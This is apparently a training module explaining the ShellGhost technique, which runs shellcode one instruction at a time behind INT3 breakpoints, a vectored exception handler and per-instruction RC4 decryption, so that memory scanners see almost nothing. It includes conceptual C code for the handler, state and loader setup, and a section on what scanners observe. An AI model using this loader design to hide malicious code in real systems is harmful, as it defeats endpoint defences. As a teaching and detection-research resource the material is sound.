Module 4: The ShellGhost Concept
The complete single-instruction execution model — how INT3, VEH, shellcode mapping, SystemFunction032, and RW/RX toggling combine into invisible shellcode.
Module Objective
This module ties together the foundational concepts (INT3 breakpoints, VEH handlers, CONTEXT usage, and per-instruction encryption) into the complete ShellGhost execution model. You will understand the full cycle: how each shellcode instruction is replaced with 0xCC, how a Python preprocessing script maps each instruction for independent encryption, and how the VEH handler, on each breakpoint, overwrites the previous instruction with 0xCC again and decrypts the current one, all within a single EXCEPTION_BREAKPOINT handler. This is the conceptual core of lem0nSec's ShellGhost technique.
1. The One-Exception Cycle
ShellGhost's execution revolves around a one-exception cycle that repeats for every instruction in the shellcode. Each iteration involves exactly one exception (EXCEPTION_BREAKPOINT) and one VEH handler invocation. That invocation does two things: it hides the previous instruction by overwriting it with 0xCC, and it decrypts the current instruction into place:
Figure: The ShellGhost One-Exception Cycle (EXCEPTION_BREAKPOINT → Restore 0xCC → SystemFunction032 → VirtualProtect → CPU runs decrypted code → cycle repeats)
| Step | Handler Action | Result |
|---|---|---|
| Step 1 | EXCEPTION_BREAKPOINT fires. Handler toggles the page to RW via VirtualProtect and overwrites the previously executed instruction's bytes with 0xCC (if any). | Previous instruction is no longer present in memory |
| Step 2 | Handler looks up the current instruction in the CRYPT_BYTES_QUOTA array, decrypts it using SystemFunction032 (RC4), and writes the decrypted bytes to the execution buffer. | Current instruction is ready for execution |
| Step 3 | Handler toggles the page from RW to RX via VirtualProtect and returns EXCEPTION_CONTINUE_EXECUTION. | CPU resumes and executes the decrypted instruction, then hits the next 0xCC |
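Step 2 works because RC4 is symmetric: XORing the same keystream into a buffer twice returns the original bytes, so one routine serves for both the offline encryption and the runtime decryption. The sketch below illustrates that property with a textbook RC4 in portable C. `rc4_apply` and `rc4_round_trip_ok` are hypothetical names introduced for illustration; the code does not call SystemFunction032 and does not reproduce its signature.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Textbook RC4, a hypothetical stand-in for the RC4 routine named in the
 * text. XORs the keystream into buf in place. */
void rc4_apply(const uint8_t *key, size_t key_len, uint8_t *buf, size_t len) {
    uint8_t s[256];
    uint8_t a = 0, b = 0, j = 0, t;
    size_t i;

    assert(key_len > 0 && key_len <= 256);

    /* Key-scheduling algorithm (KSA) */
    for (i = 0; i < 256; i++)
        s[i] = (uint8_t)i;
    for (i = 0; i < 256; i++) {
        j = (uint8_t)(j + s[i] + key[i % key_len]);
        t = s[i]; s[i] = s[j]; s[j] = t;
    }

    /* Pseudo-random generation algorithm (PRGA) */
    for (i = 0; i < len; i++) {
        a = (uint8_t)(a + 1);
        b = (uint8_t)(b + s[a]);
        t = s[a]; s[a] = s[b]; s[b] = t;
        buf[i] ^= s[(uint8_t)(s[a] + s[b])];
    }
}

/* Returns 1 if applying RC4 twice with the same key restores the input. */
int rc4_round_trip_ok(void) {
    const uint8_t key[4] = { 0x01, 0x02, 0x03, 0x04 };  /* arbitrary demo key */
    const uint8_t original[3] = { 0x48, 0x89, 0xE5 };   /* mov rbp, rsp */
    uint8_t work[3] = { 0x48, 0x89, 0xE5 };

    rc4_apply(key, sizeof key, work, sizeof work);      /* first pass: encrypt */
    rc4_apply(key, sizeof key, work, sizeof work);      /* second pass: decrypt */

    return work[0] == original[0] &&
           work[1] == original[1] &&
           work[2] == original[2];
}
```

Each call to `rc4_apply` restarts the keystream from the key, which matches the idea of encrypting every instruction independently rather than as one continuous stream.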
2. Memory State at Each Phase
To make this concrete, let us trace the memory state through two iterations of the cycle. Assume the shellcode starts at address 0x1000. The first instruction is 0x48 0x89 0xE5 (mov rbp, rsp, 3 bytes) and the second is 0x48 0x83 0xEC 0x20 (sub rsp, 0x20, 4 bytes):
Step-by-Step Memory Trace
| Step | Memory at 0x1000-0x1002 | Memory at 0x1003-0x1006 | RIP | Event |
|---|---|---|---|---|
| Initial | CC CC CC | CC CC CC CC | 0x1000 | CPU encounters 0xCC, BREAKPOINT fires |
| After 1st BP handler | 48 89 E5 | CC CC CC CC | 0x1000 | Handler decrypts instruction 1, toggles to RX |
| After instruction 1 executes | 48 89 E5 | CC CC CC CC | 0x1003 | CPU executes mov rbp,rsp; hits next 0xCC, BREAKPOINT fires |
| After 2nd BP handler | CC CC CC | 48 83 EC 20 | 0x1003 | Handler restores 0xCC over instruction 1, decrypts instruction 2, toggles to RX |
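The trace above can be reproduced with a plain byte array. The following is a minimal simulation, assuming straight-line execution of the two example instructions. Nothing is executed and no exception is raised; decryption is abstracted to a copy from a plaintext table. `SimEntry`, `SimState`, `sim_breakpoint`, and `sim_byte_after` are hypothetical names used only for this model.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical mirror of one map entry: instruction offset and length. */
typedef struct { uint32_t rva; uint32_t quota; } SimEntry;

typedef struct {
    uint8_t buf[7];        /* models addresses 0x1000..0x1006 */
    const uint8_t *plain;  /* plaintext bytes (decryption abstracted away) */
    const SimEntry *map;
    int prev;              /* index of the visible instruction, -1 if none */
} SimState;

/* Models one handler invocation for instruction `cur`: refill the previous
 * instruction with 0xCC, then reveal the current one. */
void sim_breakpoint(SimState *s, int cur) {
    assert(cur >= 0);
    if (s->prev >= 0)
        memset(s->buf + s->map[s->prev].rva, 0xCC, s->map[s->prev].quota);
    memcpy(s->buf + s->map[cur].rva,
           s->plain + s->map[cur].rva,
           s->map[cur].quota);
    s->prev = cur;
}

/* Returns the byte at `offset` after `steps` simulated handler invocations
 * (0 = initial state, 1 = after 1st breakpoint, 2 = after 2nd breakpoint). */
uint8_t sim_byte_after(int steps, size_t offset) {
    static const uint8_t plain[7] = { 0x48, 0x89, 0xE5,         /* mov rbp, rsp  */
                                      0x48, 0x83, 0xEC, 0x20 }; /* sub rsp, 0x20 */
    static const SimEntry map[2] = { { 0, 3 }, { 3, 4 } };
    SimState s;
    int i;

    assert(steps >= 0 && steps <= 2 && offset < sizeof s.buf);

    memset(s.buf, 0xCC, sizeof s.buf);  /* initial state: all breakpoints */
    s.plain = plain;
    s.map = map;
    s.prev = -1;

    for (i = 0; i < steps; i++)
        sim_breakpoint(&s, i);
    return s.buf[offset];
}
```

For example, `sim_byte_after(1, 0)` yields 0x48 (instruction 1 visible), while `sim_byte_after(2, 0)` yields 0xCC (instruction 1 hidden again) and `sim_byte_after(2, 3)` yields 0x48 (instruction 2 visible), matching the rows of the table.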
Important Nuance: Multi-Byte Instructions
x86/x64 instructions can be 1 to 15 bytes long. ShellGhost handles this through the shellcode mapping preprocessing step. The Python script (ShellGhost_mapping.py) disassembles the shellcode ahead of time and records each instruction's offset (RVA) and byte count (quota) in a CRYPT_BYTES_QUOTA struct. At runtime, the VEH handler uses this mapping to know exactly how many bytes to decrypt for the current instruction and how many bytes of the previous one to overwrite with 0xCC. There is no need to determine instruction boundaries at runtime.
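Because the boundaries are fixed offline, the runtime side reduces to table lookups. The sketch below shows two checks such a table supports, assuming the entries are sorted by offset and tile the shellcode without gaps. `MapEntry` is a hypothetical fixed-width mirror of CRYPT_BYTES_QUOTA, and `map_is_contiguous`, `map_find_by_rva`, and `example_map` are illustrative names, not part of ShellGhost.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical mirror of CRYPT_BYTES_QUOTA using fixed-width types. */
typedef struct { uint32_t rva; uint32_t quota; } MapEntry;

/* Returns 1 if the entries cover [0, total) with no gaps or overlaps and
 * every length is a valid x86/x64 instruction length (1..15 bytes). */
int map_is_contiguous(const MapEntry *map, size_t count, uint32_t total) {
    uint32_t expected = 0;
    size_t i;

    assert(map != NULL || count == 0);
    for (i = 0; i < count; i++) {
        if (map[i].rva != expected)
            return 0;
        if (map[i].quota < 1 || map[i].quota > 15)
            return 0;
        expected += map[i].quota;
    }
    return expected == total;
}

/* Binary search for the entry that starts exactly at `rva`.
 * Returns its index, or -1 if `rva` is not an instruction boundary. */
int map_find_by_rva(const MapEntry *map, size_t count, uint32_t rva) {
    size_t lo = 0, hi = count;

    assert(map != NULL || count == 0);
    while (lo < hi) {
        size_t mid = lo + (hi - lo) / 2;
        if (map[mid].rva == rva)
            return (int)mid;
        if (map[mid].rva < rva)
            lo = mid + 1;
        else
            hi = mid;
    }
    return -1;
}

/* Three-instruction example: 3-byte, 4-byte, and 2-byte instructions. */
const MapEntry example_map[3] = { { 0x0000, 3 }, { 0x0003, 4 }, { 0x0007, 2 } };
```

Looking an entry up by offset rather than by a running counter also gives the right answer when control flow is not strictly sequential, since the offset of the faulting address identifies the instruction directly.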
3. The Handler Logic
ShellGhost's VEH handler performs all work within a single EXCEPTION_BREAKPOINT handler. Each invocation both hides the previous instruction and decrypts the current one:
    // Conceptual handler logic
    LONG CALLBACK GhostHandler(PEXCEPTION_POINTERS ep) {
        DWORD code = ep->ExceptionRecord->ExceptionCode;
        PCONTEXT ctx = ep->ContextRecord;
        DWORD old = 0;

        if (code == EXCEPTION_BREAKPOINT) {
            // Rip already points to the 0xCC (kernel adjusted it)
            PBYTE current = (PBYTE)ctx->Rip;

            // Validate: is this in our execution buffer?
            if (!IsInExecBuffer(current))
                return EXCEPTION_CONTINUE_SEARCH;

            // Step 1: Hide the PREVIOUS instruction (if any)
            //   - Toggle to RW via VirtualProtect
            //   - Write 0xCC back over previous instruction bytes
            if (g_ghost.prev_index >= 0) {
                ReEncryptPrevious();
            }

            // Step 2: Decrypt the CURRENT instruction
            //   - Look up CRYPT_BYTES_QUOTA for current instruction index
            //   - Use SystemFunction032 to decrypt instruction bytes
            //   - Write decrypted bytes to execution buffer
            DecryptCurrent(g_ghost.current_index);

            // Step 3: Toggle memory to RX for execution
            VirtualProtect(g_ghost.exec_buffer, g_ghost.exec_size,
                           PAGE_EXECUTE_READ, &old);

            // Step 4: Advance instruction index
            // (simplification: assumes instructions run strictly in order)
            g_ghost.prev_index = (INT)g_ghost.current_index;
            g_ghost.current_index++;

            return EXCEPTION_CONTINUE_EXECUTION;
        }

        // Not our exception
        return EXCEPTION_CONTINUE_SEARCH;
    }
4. The Data Structures
ShellGhost needs to maintain several pieces of state across handler invocations. These are typically stored in global variables accessible to the VEH handler:
    // Key data structure: per-instruction encryption mapping
    // Generated by ShellGhost_mapping.py preprocessing script
    typedef struct _CRYPT_BYTES_QUOTA {
        DWORD rva;    // Offset of this instruction within the shellcode
        DWORD quota;  // Number of bytes in this instruction
    } CRYPT_BYTES_QUOTA;

    // Example: first 3 instructions mapped by the preprocessing script
    // CRYPT_BYTES_QUOTA map[] = {
    //     { 0x0000, 3 },  // mov rbp, rsp   (3 bytes at offset 0)
    //     { 0x0003, 4 },  // sub rsp, 0x20  (4 bytes at offset 3)
    //     { 0x0007, 2 },  // xor ecx, ecx   (2 bytes at offset 7)
    //     ...
    // };

    // Global state for the ShellGhost handler
    typedef struct _GHOST_CONTEXT {
        LPVOID exec_buffer;       // Base address of the 0xCC-filled RW region
        SIZE_T exec_size;         // Size of the execution buffer
        PBYTE  encrypted_sc;      // Per-instruction encrypted shellcode bytes
        SIZE_T sc_size;           // Size of the shellcode

        // Instruction mapping (from preprocessing)
        CRYPT_BYTES_QUOTA *map;   // Array of per-instruction RVA + byte count
        DWORD num_instructions;   // Total number of mapped instructions
        DWORD current_index;      // Index of current instruction being executed

        // RC4 key for SystemFunction032
        BYTE   rc4_key[16];       // RC4 encryption key
        SIZE_T key_len;           // Key length

        // Tracking state
        INT prev_index;           // Index of previously executed instruction (-1 if none)
    } GHOST_CONTEXT;

    static GHOST_CONTEXT g_ghost = { 0 };
Why Global State?
VEH handlers receive only the EXCEPTION_POINTERS parameter — there is no way to pass custom context. Therefore, ShellGhost stores its state in global (or static) variables. This is safe because the execution buffer is only used by a single thread. If multi-threaded execution were needed, the state would need thread-local storage or synchronization.
5. Setup and Initialization
Before the execution cycle begins, ShellGhost performs these initialization steps:
    // Note: In real ShellGhost, the preprocessing is done OFFLINE
    // by ShellGhost_mapping.py. The encrypted data and CRYPT_BYTES_QUOTA
    // arrays are compiled directly into the C source as static arrays.
    void ShellGhostInit(
        PBYTE encrypted_sc,        // Pre-encrypted shellcode (from mapping.py)
        SIZE_T sc_size,
        CRYPT_BYTES_QUOTA *map,    // Instruction map (from mapping.py)
        DWORD num_instructions,
        PBYTE key, SIZE_T key_size
    ) {
        // Reject keys that would overflow the fixed-size key buffer
        if (key_size > sizeof(g_ghost.rc4_key))
            return;

        // Step 1: Store encrypted data and mapping references
        g_ghost.encrypted_sc = encrypted_sc;
        g_ghost.sc_size = sc_size;
        g_ghost.map = map;
        g_ghost.num_instructions = num_instructions;
        memcpy(g_ghost.rc4_key, key, key_size);
        g_ghost.key_len = key_size;
        g_ghost.prev_index = -1;
        g_ghost.current_index = 0;

        // Step 2: Allocate execution buffer filled with 0xCC (RW, not RWX)
        g_ghost.exec_buffer = VirtualAlloc(NULL, sc_size,
            MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
        if (g_ghost.exec_buffer == NULL)
            return;
        memset(g_ghost.exec_buffer, 0xCC, sc_size);
        g_ghost.exec_size = sc_size;

        // Step 3: Register VEH handler (First = 1: called before other handlers)
        AddVectoredExceptionHandler(1, GhostHandler);

        // Step 4: Create thread at end of .text segment
        // ResolveEndofTextSegment() finds null bytes to use as entry
        LPVOID entry = ResolveEndofTextSegment();
        HANDLE hThread = CreateThread(NULL, 0,
            (LPTHREAD_START_ROUTINE)entry, NULL, 0, NULL);
        if (hThread != NULL) {
            WaitForSingleObject(hThread, INFINITE);
            CloseHandle(hThread);
        }
    }
6. Address Validation
A critical part of the handler is verifying that the exception originated from within the execution buffer. Without this check, the handler would incorrectly process breakpoints from other sources (debugger breakpoints, other code using INT3, etc.):
    // Check if the address is within our execution buffer
    // (half-open range: base <= addr < base + size)
    BOOL IsInExecBuffer(PVOID addr) {
        PBYTE p = (PBYTE)addr;
        PBYTE base = (PBYTE)g_ghost.exec_buffer;
        return (p >= base) && (p < base + g_ghost.exec_size);
    }

    LONG CALLBACK GhostHandler(PEXCEPTION_POINTERS ep) {
        PCONTEXT ctx = ep->ContextRecord;

        if (ep->ExceptionRecord->ExceptionCode == EXCEPTION_BREAKPOINT) {
            // For breakpoint: the kernel (KiDispatchException) already
            // decremented RIP by 1, so ContextRecord->Rip points directly
            // at the 0xCC byte. No manual adjustment needed.
            PVOID cc_addr = (PVOID)ctx->Rip;

            if (!IsInExecBuffer(cc_addr)) {
                return EXCEPTION_CONTINUE_SEARCH;  // Not ours
            }
            // ... handle our breakpoint
        }
        // ...
    }
7. The Complete Conceptual Flow
Here is the entire ShellGhost execution flow from start to finish:
Preprocessing Phase (Offline)
- ShellGhost_mapping.py disassembles the raw shellcode using a disassembler (e.g., Capstone)
- Each instruction's offset (RVA) and byte count (quota) are recorded into CRYPT_BYTES_QUOTA structs
- Each instruction is encrypted independently with RC4 using SystemFunction032
- The encrypted data and mapping arrays are output as C source code to be compiled into the binary
Initialization Phase (Runtime)
- Load the pre-encrypted shellcode data and instruction map (compiled into the binary)
- Allocate a PAGE_READWRITE region and fill it entirely with 0xCC
- Register the VEH handler with First = 1
- Create a new thread via CreateThread() with entry at the end of the .text segment
Execution Cycle (repeats per instruction)
1. CPU hits 0xCC at current position → EXCEPTION_BREAKPOINT fires
2. VEH handler: ContextRecord->Rip already points at the 0xCC (kernel adjusted it)
3. VEH handler: toggle page to RW via VirtualProtect
4. VEH handler: overwrite the previously executed instruction with 0xCC (if any)
5. VEH handler: look up CRYPT_BYTES_QUOTA for current instruction index to get RVA and byte count
6. VEH handler: call SystemFunction032 to decrypt the instruction bytes at that offset
7. VEH handler: write the decrypted bytes to the execution buffer
8. VEH handler: toggle page to RX via VirtualProtect and return EXCEPTION_CONTINUE_EXECUTION
9. CPU executes the decrypted instruction, then encounters the next 0xCC → cycle repeats from step 1
Termination
When the shellcode executes a ret instruction or otherwise transfers control outside the execution buffer, the next exception (if any) will not pass the address validation check, and normal execution resumes. If the shellcode calls Windows APIs, those calls execute normally without triggering breakpoints (the APIs live outside the execution buffer).
8. What a Memory Scanner Sees
At any point during execution, a memory scanner examining the execution buffer sees:
    Execution buffer during ShellGhost operation:

    Address   Content   Meaning
    0x1000    CC        INT3 (already executed and overwritten)
    0x1001    CC        INT3 (already executed and overwritten)
    0x1002    CC        INT3 (already executed and overwritten)
    0x1003    48        Decrypted instruction (currently executing)
    0x1004    83        (part of current instruction)
    0x1005    EC        (part of current instruction)
    0x1006    20        (part of current instruction)
    0x1007    CC        INT3 (not yet reached)
    ...       CC        INT3 (all remaining bytes)

    At MOST one instruction is decrypted (1-15 bytes).
    Every other byte is 0xCC.
    No shellcode signature. No recognizable instruction sequence. No high-entropy blob in the buffer.
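The "at most one instruction" property can be quantified by counting over a snapshot of the buffer. The sketch below is an illustration only, assuming the snapshot is already available as a byte array. `count_visible_bytes`, `longest_visible_run`, and `example_snapshot` are hypothetical names, and the counts are a lower bound because a decrypted instruction may itself contain a 0xCC byte.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Number of bytes in the snapshot that are not 0xCC. */
size_t count_visible_bytes(const uint8_t *snap, size_t len) {
    size_t i, n = 0;

    assert(snap != NULL || len == 0);
    for (i = 0; i < len; i++)
        if (snap[i] != 0xCC)
            n++;
    return n;
}

/* Length of the longest run of consecutive non-0xCC bytes. */
size_t longest_visible_run(const uint8_t *snap, size_t len) {
    size_t i, run = 0, best = 0;

    assert(snap != NULL || len == 0);
    for (i = 0; i < len; i++) {
        if (snap[i] != 0xCC) {
            run++;
            if (run > best)
                best = run;
        } else {
            run = 0;
        }
    }
    return best;
}

/* Snapshot matching the listing: instruction 2 is visible at offsets 3..6. */
const uint8_t example_snapshot[10] = {
    0xCC, 0xCC, 0xCC, 0x48, 0x83, 0xEC, 0x20, 0xCC, 0xCC, 0xCC
};
```

On `example_snapshot`, both functions report 4, the length of the single visible instruction. The same counts also show that the buffer consists almost entirely of one repeated byte value, which is a measurable property of the region in its own right.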
The "Ghost" Effect
This is why the tool is called ShellGhost. The shellcode is like a ghost — it is there, executing and producing effects, but you cannot observe it. A memory scan shows nothing. A memory dump shows nothing. The shellcode materializes one instruction at a time, executes, and vanishes back into a sea of 0xCC bytes.
Knowledge Check
Q1: How many exceptions does ShellGhost generate per shellcode instruction?
Q2: Why must the VEH handler check if the exception address is within the execution buffer?
Q3: What does the execution buffer contain when a memory scanner reads it during ShellGhost execution?